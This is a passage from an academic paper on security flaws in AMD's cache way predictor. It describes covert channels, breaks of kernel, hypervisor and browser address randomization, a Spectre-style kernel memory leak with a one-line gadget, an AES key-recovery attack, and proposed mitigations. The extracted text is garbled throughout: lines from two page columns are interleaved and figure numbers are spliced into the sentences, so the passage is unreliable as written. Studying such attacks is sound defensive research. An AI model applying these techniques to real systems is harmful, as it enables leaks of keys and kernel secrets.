Environment. We evaluate our attacks on different environments
one bit of information on its own. We extended the described µTag
listed in Table 1, with CPUs from K8 (released 2013) to Zen 2 (re-
covert channel to transmit multiple bits in parallel by utilizing mul-
leased in 2019). We have reverse-engineered 2 unique hash func-
tiple cache sets. Instead of decoding the transmitted bit based on
tions, as described in Section 3. One is the same for all Zen microar-
the timing difference of one address, we use two addresses in two
chitectures, and the other is the same for all previous microarchi-
cache sets for every bit we transmit: One to represent a 1-bit and
tectures with a way predictor.
the other to represent the 0-bit. As the L1D has 64 cache sets, we
can transmit up to 32 bit in parallel without reusing cache sets.
5.1 Covert Channel
A covert channel is a communication channel between two parties Performance Evaluation. We evaluated the transmission and er-
that are not allowed to communicate with each other. Such a covert ror rate of our covert channel in a local setting and a cloud set-
channel can be established by leveraging a side channel. The µTag ting by sending and receiving a randomly generated data blob. We
used by AMD’s L1D way prediction enables a covert channel for achieved a maximum transmission rate of 588.9 kB/s (σx̄ = 0.544,
two processes accessing addresses with the same µTag. n = 1000) using 80 channels in parallel on the AMD Ryzen Thread-
For the most simplistic form of the covert channel, two processes ripper 1920X. On the AMD EPYC 7571 in the Amazon EC2 cloud, we
agree on a µTag and a cache set (i.e., the least-significant 12 bits of achieved a maximum transmission rate of 544.0 kB/s (σx̄ = 0.548,
the virtual addresses are the same). This µTag is used for sending n = 1000) also using 80 channels. In contrast, L1 Prime+Probe
and receiving data by inducing and measuring cache misses. achieved a transmission rate of 400 kB/s [59] and Flush+Flush a
In the initialization phase, both parties allocate their own page. transmission rate of 496 kB/s [30]. As illustrated in Figure 4, the
The sender chooses a virtual address v S , and the receiver chooses mean transmission rate increases with the number of bits sent in
a virtual address v R that fulfills the aforementioned requirements, parallel. However, the error rate increases drastically when trans-
i.e., v S and v R are in the same cache set and yield the same µTag. mitting more than 64 bits in parallel, as illustrated in Figure 6. As
The µTag can simply be computed using the reverse-engineered the number of available different cache sets for our channel is
hash function of Section 3. exhausted for our covert channel, sending more bits in parallel
ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan Lipp, et al.

600 Table 2: Evaluation of the ASLR experiments

TR [kB/s]

400
Target Entropy Bits Reduced Success Rate Timing Source Time

200 Linux Kernel 9 7 98.5% thread 0.51 ms (σ = 12.12 µs)

AMD Ryzen Threadripper 1920X
User Process 13 13 88.9% thread 1.94 s (σ = 1.76 s)
AMD EPYC 7751 Virt. Manager 28 16 90.0% rdtsc 2.88 s (σ = 3.16 s)
0 Virt. Module 18 8 98.9% rdtsc 0.14 s (σ = 1.74 ms)
0 20 40 60 80 Mozilla Firefox 28 15 98.0% web worker 2.33 s (σ = 0.03 s)
Google Chrome 28 15 86.1% web worker 2.90 s (σ = 0.25 s)
Number of Channels Chrome V8 28 15 100.0% rdtsc 1.14 s (σ = 0.03 s)

Figure 4: Mean transmission rate of the covert channels us-

ing multiple parallel channels on different CPUs.

would reuse already used sets. This increases the chance of wrong mapping functions (Section 3.2) to infer bits of the addresses. We
measurements and, thus, the error rate. show an additional attack on heap ASLR in Appendix C.
Error Correction. As accesses to unrelated addresses with the same
µTag as our covert channel introduce noise in our measurements, 5.2.1 Kernel. On modern Linux systems, the position of the kernel
an attacker can use error correction to achieve better transmission. text segment is randomized inside the 1 GB area from 0xffff ffff
Using hamming codes [33], we introduce n additional parity bits 8000 0000 - 0xffff ffff c000 0000 [39, 46]. As the kernel image
allowing us to detect and correct wrongly measured bits of a packet is mapped using 2 MB pages, it can only be mapped in 512 different
with a size of 2n − 1 bits. For our covert channel, we implemented locations, resulting in 9 bit of entropy [65].
different Hamming codes H (m, n) that encode n bits by adding Global variables are stored in the .bss and .data sections of
m − n parity bits. The receiving end of the covert channel computes the kernel image. Since 2 MB physical pages are used, the 21 lower
the parity bits from the received data and compares it with the address bits of a global variable are identical to the lower 21 bits
received parity bits. Naturally, they only differ if a transmission of the offset within the the kernel image section. Typically, the
error occurred. The erroneous bit position can be computed, and kernel image is public and does not differ among users with the
the bit error corrected by flipping the bit. This allows to detect up same operating system. With the knowledge of the µTag from the
to 2-bit errors and correct one-bit errors for a single transmission. address of a global variable, one can compute the address bits 21 to
We evaluated different hamming codes on an AMD Ryzen Thread- 27 using the hash function of AMD’s L1D cache way predictor.
ripper 1920X, as illustrated in Figure 7 in Appendix B. When sending To defeat KASLR using Collide+Probe, the attacker needs to
data through 60 parallel channels, the H (7, 4) code reduces the error know the offset of a global variable within the kernel image that is
rate to 0.14 % (σx̄ = 0.08, n = 1000), whereas the H (15, 11) code accessed by the kernel on a user-triggerable event, e.g., a system
achieves an error rate of 0.16 % (σx̄ = 0.08, n = 1000). While the call or an interrupt. While not many system calls access global
H (7, 4) code is slightly more robust [33], the H (15, 11) code achieves variables, we found that the SYS_time system call returns the value
a better transmission rate of 452.2 kB/s (σx̄ = 7.79, n = 1000). of the global second counter obj.xtime_sec. Using Collide+Probe,
More robust protocols have been used in cache-based covert the attacker accesses an address v ′ with a specific µTag µv ′ and
channels in the past [48, 53] to achieve error-free communication. schedules the system call, which accesses the global variable with
While these techniques can be applied to our covert channel as well, address v and µTag µv . Upon returning from the kernel, the attacker
we leave it up to future work. probes the µTag µv ′ using address v ′ . On a conflict, the attacker
infers that the address v ′ has the same µTag, i.e., t = µv ′ = µv .
Limitations. As we are not able to observe µTag collisions be- Otherwise, the attacker chooses another address v ′ with a different
tween two processes running on sibling threads on one physical µTag µv ′ and repeats the process. As the µTag bits t 0 to t 7 are known,
core, our covert channel is limited to processes running on the same the address bits v 20 to v 27 can be computed from address bits v 12
logical core. to v 19 based on the way predictor’s hash functions (Section 3.2).
Following this approach, we can compute address bits 21 to 27 of
5.2 Breaking ASLR and KASLR the global variable. As we know the offset of the global variable
To exploit a memory corruption vulnerability, an attacker often inside the kernel image, we can also recover the start address of the
requires knowledge of the location of specific data in memory. kernel image mapping, leaving only bits 28 and 29 unknown. As
With address space layout randomization (ASLR), a basic memory the kernel is only randomized once per boot, the reduction to only
protection mechanism has been developed that randomizes the 4 address possibilities gives an attacker a significant advantage.
locations of memory sections to impede the exploitation of these For the evaluation, we tested 10 different randomization offsets
bugs. ASLR is not only applied to user-space applications but also on a Linux 4.15.0-58 kernel with an AMD Ryzen Threadripper 1920X
implemented in the kernel (KASLR), randomizing the offsets of processor. We ran our experiment 1000 times for each randomiza-
code, data, and modules on every boot. tion offset. With a success rate of 98.5 %, we were able to reduce the
In this section, we exploit the relation between virtual addresses entropy of KASLR on average in 0.51 ms (σ = 12.12 µs, n = 10 000).
and µTags to reduce the entropy of ASLR in different scenarios. While there are several microarchitectural KASLR breaks, this
With Collide+Probe, we can determine the µTags accessed by the is to the best of our knowledge the first which reportedly works
victim, e.g., the kernel or the browser, and use the reverse-engineered on AMD and not only on Intel CPUs. Hund et al. [35] measured
Take A Way: Exploring the Security Implications of AMD’s Cache Way Predictors ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan

differences in the runtime of page faults when repeatedly access- is located. As the equation system is very small, an attacker can
ing either valid or invalid kernel addresses on Intel CPUs. Bar- trivially solve it in JavaScript.
resi et al. [11] exploited page deduplication to break ASLR: a copy- However, to distinguish between colliding and non-colliding ad-
on-write pagefault only occurs for the page with the correctly dresses, we require a high-precision timer in JavaScript. While
guessed address. Gruss et al. [28] exploited runtime differences in the performance.now() function only returns rounded results
the prefetch instruction on Intel CPUs to detect mapped kernel for security reasons [3, 14], we leverage an alternative timing
pages. Jang et al. [39] showed that the difference in access time to source [25, 69]. For our evaluation, we used the technique of a count-
valid and invalid kernel addresses can be measured when suppress- ing thread constantly incrementing a shared variable [25, 48, 69, 80].
ing exceptions with Intel TSX. Evtyushkin et al. [22] exploited the We tested our proof-of-concept in both the Chrome 76.0.3809
branch-target buffer on Intel CPUs to gain information on mapped and Firefox 68.0.2 web browsers as well as the Chrome V8 stan-
pages. Schwarz et al. [65] showed that the store-to-load forwarding dalone engine. In Firefox, we are able to reduce the entropy by
logic on Intel CPUs is missing a permission check which allows 15 bits with a success rate of 98 % and an average run time of 2.33 s
to detect whether any virtual address is valid. Canella et al. [16] (σ = 0.03 s, n = 1000). With Chrome, we can correctly reduce the
exploited that recent stores can be leaked from the store buffer on bits with a success rate of 86.1 % and an average run time of 2.90 s
vulnerable Intel CPUs, allowing to detect valid kernel addresses. (σ = 0.25 s, n = 1000). As the JavaScript standard does not provide
any functionality to retrieve the addresses used by variables, we
5.2.2 Hypervisor. The Kernel-based Virtual Machine (KVM) is a extended the capabilities of the Chrome V8 engine to verify our re-
virtualization module that allows the Linux kernel to act as a hyper- sults. We introduced several custom JavaScript functions, including
visor to run multiple, isolated environments in parallel called virtual one that returned the virtual address of an array. This provided us
machines or guests. Virtual machines can communicate with the with the ground truth to verify that our proof-of-concept recovered
hypervisor using hypercalls with the privileged vmcall instruction. the address bits correctly. Inside the extended Chrome V8 engine,
In the past, collisions in the branch target buffer (BTB) have been we were able to recover the address bits with a success rate of 100 %
used to break hypervisor ASLR [22, 78]. and an average run time of 1.14 s (σ = 0.03 s, n = 1000).
In this scenario, we leak the base address of the KVM kernel
module from a guest virtual machine. We issue hypercalls with 5.3 Leaking Kernel Memory
invalid call numbers and monitor, which µTags have been accessed In this section, we combine Spectre with Collide+Probe to leak
using Collide+Probe. In our evaluation, we identified two cache sets kernel memory without the requirement of shared memory. While
enabling us to weaken ASLR of the kvm and the kvm_amd module some Spectre-type attacks use AVX [70] or port contention [13],
with a success rate of 98.8 % and an average runtime of 0.14 s (σ = most attacks use the cache as a covert channel to encode secrets [17,
1.74 ms, n = 1000). We verified our results by comparing the leaked 41]. During transient execution, the kernel caches a user-space ad-
address bits with the symbol table (/proc/kallsyms). dress based on a secret. By monitoring the presence of said address
Another target is the user-space virtualization manager, e.g., in the cache, the attacker can deduce the leaked value.
QEMU. Guest operating systems can interact with virtualization As AMD CPU’s are not vulnerable to Meltdown [49], stronger
managers through various methods, e.g., the out instruction. Like- kernel isolation [27] is not enforced on modern operating systems,
wise to the previously described hypercall method, a guest virtual leaving the kernel mapped in user space. However, with SMAP
machine can use this method to trigger the managing user pro- enabled, the processor never loads an address into the cache if the
cess to interact with the guest memory from its own address space. translation triggers a SMAP violation, i.e., the kernel tries to access
By using Collide+Probe in this scenario, we were able to reduce a user-space address [9]. Thus, an attacker has to find a vulnerable
the ASLR entropy by 16 bits with a success rate of 90.0 % with an indirect branch that can access user-space memory. We lift this
average run time of 2.88 s (σ = 3.16 s, n = 1000). restriction by using Collide+Probe as a cache-based covert channel
to infer secret values accessed by the kernel. With Collide+Probe,
5.2.3 JavaScript. In this section, we show that Collide+Probe is we can observe µTag collisions based on the secret value that is
not only restricted to native environments. We use Collide+Probe leaked and, thus, remove the requirement of shared memory, i.e.,
to break ASLR from JavaScript within Chrome and Firefox. As the user memory that is directly accessible to the kernel.
JavaScript standard does not define a way to retrieve any address in- To evaluate Collide+Probe as a covert channel for a Spectre-
formation, side channels in browsers have been used in the past [57], type attack, we implement a custom kernel module containing a
also to break ASLR, simplifying browser exploitation [25, 65]. Spectre-PHT gadget as illustrated as follows:
The idea of our ASLR break is similar to the approach of reverse-
1 if (index < bounds) { a = LUT[data[index] * 4096]; }
engineering the way predictor’s mapping function, as described
in Section 3.2. First, we allocate a large chunk of memory as a The execution of the presented code snippet can be triggered
JavaScript typed array. If the requested array length is big enough, with an ioctl command that allows the user to control the in-
the execution engine allocates it using mmap, placing the array at dex variable as it is passed as an argument. First, we mistrain the
the beginning of a memory page [29, 69]. This allows using the branch predictor by repeatedly providing an index that is in bounds,
indices within the array as virtual addresses with an additional letting the processor follow the branch to access a fixed kernel-
constant offset. By accessing pairs of addresses, we can find µTag memory location. Then, we access an address that collides with the
collisions allowing us to build an equation system where the only kernel address accessed based on a possible byte-value located at
unknown bits are the bits of the address where the start of the array data[index]. By providing an out-of-bounds index, the processor
ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan Lipp, et al.

0x186800 0x186800
now speculatively accesses a memory location based on the secret
99 94 94 94 93 93 92 92 92 94 95 92 92 92 93 94 195 177 181 180 183 180 185 179 170 181 177 176 175 178 173 175

0x186840 93 100 90 91 93 88 93 91 91 90 92 91 88 93 89 91 0x186840 179 197 180 174 180 177 177 177 176 172 166 170 177 183 167 180

0x186880 0x186880
data located at the out-of-bounds index. Using Collide+Probe, we
94 87 100 92 95 97 95 92 89 93 93 92 95 87 90 97 179 182 196 176 181 185 180 166 172 177 175 182 188 169 183 171

0x1868c0 96 93 93 100 94 90 93 92 94 95 90 91 94 92 90 89 0x1868c0 180 182 176 194 178 178 174 167 182 175 182 174 177 174 178 174

0x186900 0x186900
can now detect if the kernel has accessed the address based on
94 90 92 88 100 90 93 88 94 91 87 96 90 88 90 91 184 182 184 177 193 186 180 173 177 176 171 181 182 184 161 172

0x186940 91 90 91 95 89 100 86 91 90 95 93 95 94 93 96 89 0x186940 175 178 174 172 181 196 183 179 182 182 175 176 179 182 172 182

0x186980 0x186980
the assumed secret byte value. By repeating this step for each of
94 88 95 95 94 88 100 88 93 89 91 82 90 91 87 91 176 181 179 171 178 175 189 164 177 176 172 175 174 164 177 183

Address

Address
0x1869c0 93 98 91 88 91 89 94 99 87 85 94 91 96 93 90 92 0x1869c0 175 171 179 172 172 182 173 196 180 174 189 179 182 169 179 175

0x186a00 0x186a00
the 256 possible byte values, we can deduce the actual byte as we
95 91 89 89 90 93 91 92 100 89 91 92 89 90 92 88 179 177 170 168 180 174 178 179 189 182 178 186 179 179 179 182

0x186a40 95 89 96 90 92 91 96 89 90 100 91 90 91 92 92 88 0x186a40 185 185 169 178 165 177 169 167 174 197 171 177 184 174 171 172

0x186a80 0x186a80
observe µTag conflicts. As we cannot ensure that the processor
95 94 88 91 95 91 91 92 93 88 100 94 95 93 92 93 176 180 171 169 178 182 178 177 182 183 195 166 172 182 175 178

0x186ac0 93 93 94 91 90 93 92 94 92 96 90 100 92 91 90 88 0x186ac0 168 185 179 171 177 173 189 179 190 185 182 195 175 178 186 184

0x186b00 0x186b00
always misspeculates when providing the out-of-bounds index, we
90 95 92 94 90 91 90 90 96 97 92 94 100 91 93 88 171 177 180 173 179 176 174 180 176 184 169 178 195 179 172 169

0x186b40 91 87 91 89 88 93 93 94 87 95 95 91 89 100 87 93 0x186b40 178 187 172 164 171 180 178 180 173 174 183 175 181 196 175 174

0x186b80 0x186b80
run this attack multiple times for each byte we want to leak.
96 93 91 90 94 93 94 90 89 97 95 94 92 95 100 97 185 173 179 175 179 182 182 175 178 177 172 170 176 178 185 187

0x186bc0 88 92 93 96 91 97 89 94 95 84 92 98 91 97 90 100 0x186bc0 179 180 181 180 174 180 179 175 182 181 172 179 181 170 176 186

We successfully leaked a secret string using Collide+Probe as a 00 10 20 30 40 50 60 70 80 90 a0 b0 c0 d0 e0 f0

Byte value
00 10 20 30 40 50 60 70 80 90 a0 b0 c0 d0 e0 f0
Byte value
covert channel on an AMD Ryzen Threadripper 1920X. With our
unoptimized version, we are able to leak the secret bytes with a suc- (a) Collide+Probe (b) Load+Reload
cess rate of 99.5 % (σx̄ = 0.19, n = 100) and a leakage rate of 0.66 B/s
(σx̄ = 0.00043, n = 100). While we leak full byte values in our proof- Figure 5: Cache access pattern with Collide+Probe and Load+
of-concept, other gadgets could allow to leak bit-wise, reducing Reload on the first key byte.
the overhead of measuring every possible byte value significantly.
In addition, the parameters for the number of mistrainings or the
necessary repetitions of the attack to leak a byte can be further
tweaked to match the processor under attack. To utilize this side higher number of cache hits than the other parts of the table. We
channel, the attacker requires the knowledge of the address of the repeated every experiment 1000 times. With Collide+Probe, we can
kernel-memory that is accessed by the gadget. Thus, on systems successfully recover with a probability of 100 % (σx̄ = 0) the upper
with active kernel ASLR, the attacker first needs to defeat it. How- 4 bits of each ki with 168 867 (σx̄ = 719) encryptions per byte in
ever, as described in Section 5.2, the attacker can use Collide+Probe 0.07 s (σx̄ = 0.0003). With Load+Reload, we require 367 731 (σx̄ =
to derandomize the kernel as well. 82388) encryptions and an average runtime of 0.53 s (σx̄ = 0.11) to
recover 99.0 % (σx̄ = 0.0058) of the key bits. Using Prime+Probe on
the L1 cache, we can successfully recover 99.7 % (σx̄ = 0.01) of the
5.4 Attacking AES T-Tables key bits with 450 406 encryptions (σx̄ = 1129) in 1.23 s (σx̄ = 0.003).
In this section, we show an attack on an AES [20] T-table imple-
mentation. While cache attacks have already been demonstrated 6 DISCUSSION
against T-table implementations [30, 31, 48, 58, 72] and appropriate While the official documentation of the way prediction feature
countermeasures, e.g., bit-sliced implementations [43, 62], have does not explain how it interacts with other processor features, we
been presented, they serve as a good example to demonstrate the discuss the interactions with instruction caches, transient execution,
applicability of the side channel and allow to compare it against and hypervisors.
other existing cache side-channels. Furthermore, AES T-tables are
still sometimes used in practice. While some implementations fall Instruction Caches. The patent [23] describes that AMD’s way
back to T-table implementations [21] if the AES-NI instruction predictor can be used for both data and instruction cache. However,
extension [32] is not available, others only offer T-table-based im- AMD only documents a way predictor for the L1D cache [8] and
plementations [45, 55]. For evaluation purposes, we used the T-table not for the L1I cache.
implementation of OpenSSL version 1.1.1c. Transient Execution. Speculative execution is a crucial optimiza-
In this implementation, the SubBytes, ShiftRows, and MixColumns tion in modern processors. When the CPU encounters a branch,
steps of the AES round transformation are replaced by look-ups to instead of waiting for the branch condition, the CPU guesses the
4 pre-computed T-tables T0 , . . . , T3 . As the MixColumns operation outcome and continues the execution in a transient state. If the
is omitted in the last round, an additional T-table T4 is necessary. speculation was correct, the executed instructions are committed.
Each table contains 256 4-byte words, requiring 1 kB of memory. Otherwise, they are discarded. Similarly, CPUs employ out-of-order
In our proof-of-concept, we mount the first-round attack by execution to transiently execute instructions ahead of time as soon
Osvik et al. [58]. Let ki denote the initial key bytes, pi the plaintext as their dependencies are fulfilled. On an exception, the transiently
bytes and x i = pi ⊕ ki for i = 0, . . . , 15 the initial state of AES. The executed instructions following the exception are simply discarded,
initial state bytes are used to select elements of the pre-computed but leave traces in the microarchitectural state [17]. We investi-
T-tables for the following round. An attacker who controls the gated the possibility that AMD Zen processors use the data from
plaintext byte pi and monitors which entries of the T-table are the predicted way without waiting for the physical tag returned by
accessed can deduce the key byte ki = si ⊕ pi . However, with a the TLB. However, we were not able to produce any such results.
cache-line size of 64 B, it is only possible to derive the upper 4 bit
of ki if the T-tables are properly aligned in memory. With second- Hypervisor. AMD does not document any interactions of the way
round and last-round attacks [58, 73] or disaligned T-tables [72], predictor with virtualization. As we have shown in our experiments
the key space can be reduced further. (cf. Section 5.2), the way predictor does not distinguish between
Figure 5 shows the results of a Collide+Probe and a Load+Reload virtual machines and hypervisors. The way predictor uses the vir-
attack on the AMD Ryzen Threadripper 1920X on the first key tual address without any tagging, regardless whether it is a guest
byte. As the first key byte is set to zero, the diagonal shows a or host virtual address.
Take A Way: Exploring the Security Implications of AMD’s Cache Way Predictors ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan

7 COUNTERMEASURES data n times, such that the data is accessible via n different virtual
In this section, we discuss mitigations to the presented attacks on addresses, which all have a different µTag. When accessing the data,
AMD’s way predictor. We first discuss hardware-only mitigations, a random address is chosen out of the n possible addresses. The at-
followed by mitigations requiring hardware and software changes, tacker cannot learn which T-table has been accessed by monitoring
as well as a software-only solution. the accessed µTags, as a uniform distribution over all possibilities
will be observed. This technique is not restricted to T-table imple-
Temporarily Disable Way Predictor. One solution lies in designing mentations but can be applied to virtually any secret-dependent
the processor in a way that allows temporarily disabling the way memory access within an application. With dynamic software di-
predictor temporarily. Alves et al. [4] evaluated the performance versity [19], diversified replicas of program parts are generated
impact penalty of instruction replays caused by mispredictions. By automatically to thwart cache-side channel attacks.
dynamically disabling way prediction, they observe a higher perfor-
mance than with standard way prediction. Dynamically disabling 8 CONCLUSION
way prediction can also be used to prevent attacks by disabling
it if too many mispredictions within a defined time window are The key takeaway of this paper is that AMD’s cache way predictors
detected. If an adversary tries to exploit the way predictor or if leak secret information. To understand the implementation details,
the current legitimate workload provokes too many conflicts, the we reverse engineered AMD’s L1D cache way predictor, leading
processor deactivates the way predictor and falls back to compar- to two novel side-channel attack techniques. First, Collide+Probe
ing the tags from all ways. However, it is unknown whether AMD allows monitoring memory accesses on the current logical core
processors support this in hardware, and there is no documented without the knowledge of physical addresses or shared memory.
operating system interface to it. Second, Load+Reload obtains accurate memory-access traces of
applications co-located on the same physical core.
Keyed Hash Function. The currently used mapping functions (Sec- We evaluated our new attack techniques in different scenarios.
tion 3) rely solely on bits of the virtual address. This allows an We established a high-speed covert channel and utilized it in a
attacker to reverse-engineer the used function once and easily find Spectre attack to leak secret data from the kernel. Furthermore,
colliding virtual addresses resulting in the same µTag. By keying the we reduced the entropy of different ASLR implementations from
mapping function with an additional process- or context-dependent native code and sandboxed JavaScript. Finally, we recovered a key
secret input, a reverse-engineered hash function is only valid for the from a vulnerable AES implementation.
attacker process. ScatterCache [77] and CEASAR-S [61] are novel Our attacks demonstrate that AMD’s design is vulnerable to side-
cache designs preventing cache attacks by introducing a similar channel attacks. However, we propose countermeasures in software
keyed mapping function for skewed-associative caches. Hence, we and hardware, allowing to secure existing implementations and
expect that such methods are also effective when used for the way future designs of way predictors.
predictor. Moreover, the key can be updated regularly, e.g., when
returning from the kernel, and, thus, not remain the same over the ACKNOWLEDGMENTS
execution time of the program.
We thank our anonymous reviewers for their comments and sugges-
State Flushing. With Collide+Probe, an attacker cannot monitor tions that helped improving the paper. The project was supported
memory accesses of a victim running on a sibling thread. However, by the Austrian Research Promotion Agency (FFG) via the K-project
µTag collisions can still be observed after context switches or tran- DeSSnet, which is funded in the context of COMET - Competence
sitions between kernel and user mode. To mitigate Collide+Probe, Centers for Excellent Technologies by BMVIT, BMWFW, Styria, and
the state of the way predictor can be cleared when switching to Carinthia. It was also supported by the European Research Coun-
another user-space application or returning from the kernel. Ev- cil (ERC) under the European Union’s Horizon 2020 research and
ery subsequent memory access yields a misprediction and is thus innovation programme (grant agreement No 681402). This work
served from the L2 data cache. This yields the same result as invali- also benefited from the support of the project ANR-19-CE39-0007
dating the L1 data cache, which is currently a required mitigation MIAOUS of the French National Research Agency (ANR). Additional
technique against Foreshadow [74] and MDS attacks [16, 68, 75]. funding was provided by generous gifts from Intel. Any opinions,
However, we expect it to be more power-efficient than flushing the findings, and conclusions or recommendations expressed in this
L1D. To mitigate Spectre attacks [41, 44, 51], it is already neces- paper are those of the authors and do not necessarily reflect the
sary to invalidate branch predictors upon context switches [17]. As views of the funding parties.
invalidating predictors and the L1D cache on Intel has been imple-
mented through CPU microcode updates, introducing an MSR to REFERENCES
invalidate the way predictor might be possible on AMD as well. [1] Andreas Abel and Jan Reineke. 2013. Measurement-based Modeling of the Cache
Replacement Policy. In Real-Time and Embedded Technology and Applications
Uniformly-distributed Collisions. While the previously described Symposium (RTAS).
[2] Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida
countermeasures rely on either microcode updates or hardware García, and Nicola Tuveri. 2018. Port Contention for Fun and Profit. In S&P.
modifications, we also propose an entirely software-based miti- [3] Alex Christensen. 2015. Reduce resolution of performance.now. https://bugs.
gation. Our attack on an optimized AES T-table implementation webkit.org/show_bug.cgi?id=146531
[4] Ricardo Alves, Stefanos Kaxiras, and David Black-Schaffer. 2018. Dynamically
in Section 5.4 relies on the fact that an attacker can observe the key- disabling way-prediction to reduce instruction replay. In International Conference
dependent look-ups to the T-tables. We propose to map such secret on Computer Design (ICCD).
ASIA CCS ’20, June 1–5, 2020, Taipei, Taiwan Lipp, et al.

[5] AMD. 2013. BIOS and Kernel Developer’s Guide (BKDG) for AMD Family 15h [40] Richard E Kessler. 1999. The alpha 21264 microprocessor. IEEE Micro (1999).
Models 00h-0Fh Processors. [41] Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas,
[6] AMD. 2014. Software Optimization Guide for AMD Family 15h Processors. Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz,
[7] AMD. 2017. AMD64 Architecture Programmer’s Manual. and Yuval Yarom. 2019. Spectre Attacks: Exploiting Speculative Execution. In
[8] AMD. 2017. Software Optimization Guide for AMD Family 17h Processors. S&P.
[9] AMD. 2018. Software techniques for managing speculation on AMD processors. [42] Paul C. Kocher. 1996. Timing Attacks on Implementations of Diffe-Hellman, RSA,
[10] AMD. 2019. 2nd Gen AMD EPYC Processors Set New Standard for the Modern DSS, and Other Systems. In CRYPTO.
Datacenter with Record-Breaking Performance and Significant TCO Savings. [43] Robert Könighofer. 2008. A Fast and Cache-Timing Resistant Implementation of
[11] Antonio Barresi, Kaveh Razavi, Mathias Payer, and Thomas R. Gross. 2015. CAIN: the AES. In CT-RSA.
Silently Breaking ASLR in the Cloud. In WOOT. [44] Esmaeil Mohammadian Koruyeh, Khaled Khasawneh, Chengyu Song, and Nael
[12] Daniel J. Bernstein. 2004. Cache-Timing Attacks on AES. Abu-Ghazaleh. 2018. Spectre Returns! Speculation Attacks using the Return
[13] Atri Bhattacharyya, Alexandra Sandulescu, Matthias Neugschwandtner, Alessan- Stack Buffer. In WOOT.
dro Sorniotti, Babak Falsafi, Mathias Payer, and Anil Kurmus. 2019. SMoTher- [45] Marcin Krzyzanowski. 2019. CryptoSwift: Growing collection of standard and
Spectre: exploiting speculative execution through port contention. In CCS. secure cryptographic algorithms implemented in Swift. https://cryptoswift.io
[14] Boris Zbarsky. 2015. Reduce resolution of performance.now. https://hg.mozilla. [46] Linux. 2019. Complete virtual memory map with 4-level page tables. https:
org/integration/mozilla-inbound/rev/48ae8b5e62ab //www.kernel.org/doc/Documentation/x86/x86_64/mm.txt
[15] Leon Groot Bruinderink, Andreas Hülsing, Tanja Lange, and Yuval Yarom. 2016. [47] Linux. 2019. Linux Kernel 5.0 Process (x86). https://git.kernel.org/pub/scm/
Flush, Gauss, and Reload–a cache attack on the BLISS lattice-based signature linux/kernel/git/torvalds/linux.git/tree/arch/x86/kernel/process.c
scheme. In CHES. [48] Moritz Lipp, Daniel Gruss, Raphael Spreitzer, Clémentine Maurice, and Stefan
[16] Claudio Canella, Daniel Genkin, Lukas Giner, Daniel Gruss, Moritz Lipp, Ma- Mangard. 2016. ARMageddon: Cache Attacks on Mobile Devices. In USENIX
rina Minkin, Daniel Moghimi, Frank Piessens, Michael Schwarz, Berk Sunar, Jo Security Symposium.
Van Bulck, and Yuval Yarom. 2019. Fallout: Leaking Data on Meltdown-resistant [49] Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas,
CPUs. In CCS. Anders Fogh, Jann Horn, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval
[17] Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Yarom, and Mike Hamburg. 2018. Meltdown: Reading Kernel Memory from User
Philipp Ortner, Frank Piessens, Dmitry Evtyushkin, and Daniel Gruss. 2019. A Space. In USENIX Security Symposium.
Systematic Evaluation of Transient Execution Attacks and Defenses. In USENIX [50] Fangfei Liu, Yuval Yarom, Qian Ge, Gernot Heiser, and Ruby B. Lee. 2015. Last-
Security Symposium. Level Cache Side-Channel Attacks are Practical. In S&P.
[18] Mike Clark. 2016. A new x86 core architecture for the next generation of com- [51] G. Maisuradze and C. Rossow. 2018. ret2spec: Speculative Execution Using Return
puting. In IEEE Hot Chips Symposium (HCS). Stack Buffers. In CCS.
[19] Stephen Crane, Andrei Homescu, Stefan Brunthaler, Per Larsen, and Michael [52] Clémentine Maurice, Nicolas Le Scouarnec, Christoph Neumann, Olivier Heen,
Franz. 2015. Thwarting Cache Side-Channel Attacks Through Dynamic Software and Aurélien Francillon. 2015. Reverse Engineering Intel Complex Addressing
Diversity. In NDSS. Using Performance Counters. In RAID.
[20] Joan Daemen and Vincent Rijmen. 2013. The design of Rijndael: AES-the advanced [53] Clémentine Maurice, Manuel Weber, Michael Schwarz, Lukas Giner, Daniel Gruss,
encryption standard. Carlo Alberto Boano, Stefan Mangard, and Kay Römer. 2017. Hello from the
[21] Helder Eijs. 2018. PyCryptodome: A self-contained cryptographic library for Other Side: SSH over Robust Cache Covert Channels in the Cloud. In NDSS.
Python. https://www.pycryptodome.org [54] Ahmad Moghimi, Gorka Irazoqui, and Thomas Eisenbarth. 2017. CacheZoom:
[22] Dmitry Evtyushkin, Dmitry Ponomarev, and Nael Abu-Ghazaleh. 2016. Jump How SGX Amplifies The Power of Cache Attacks. In CHES.
over ASLR: Attacking branch predictors to bypass ASLR. In MICRO. [55] Richard Moore. 2017. pyaes: Pure-Python implementation of AES block-cipher
[23] W. Shen Gene and S. Craig Nelson. 2006. MicroTLB and micro tag for reducing and common modes of operation. https://github.com/ricmoo/pyaes
power in a processor . US Patent 7,117,290 B2. [56] Louis-Marie Vincent Mouton, Nicolas Jean Phillippe Huot, Gilles Eric Grandou,
[24] Ben Gras, Kaveh Razavi, Herbert Bos, and Cristiano Giuffrida. 2018. Translation and Stephane Eric Sebastian Brochier. 2012. Cache accessing using a micro TAG.
Leak-aside Buffer: Defeating Cache Side-channel Protections with TLB Attacks. US Patent 8,151,055.
In USENIX Security Symposium. [57] Yossef Oren, Vasileios P Kemerlis, Simha Sethumadhavan, and Angelos D
[25] Ben Gras, Kaveh Razavi, Erik Bosman, Herbert Bos, and Cristiano Giuffrida. 2017. Keromytis. 2015. The Spy in the Sandbox: Practical Cache Attacks in JavaScript
ASLR on the Line: Practical Cache Attacks on the MMU. In NDSS. and their Implications. In CCS.
[26] William Gropp, Ewing Lusk, Nathan Doss, and Anthony Skjellum. 1996. A high- [58] Dag Arne Osvik, Adi Shamir, and Eran Tromer. 2006. Cache Attacks and Coun-
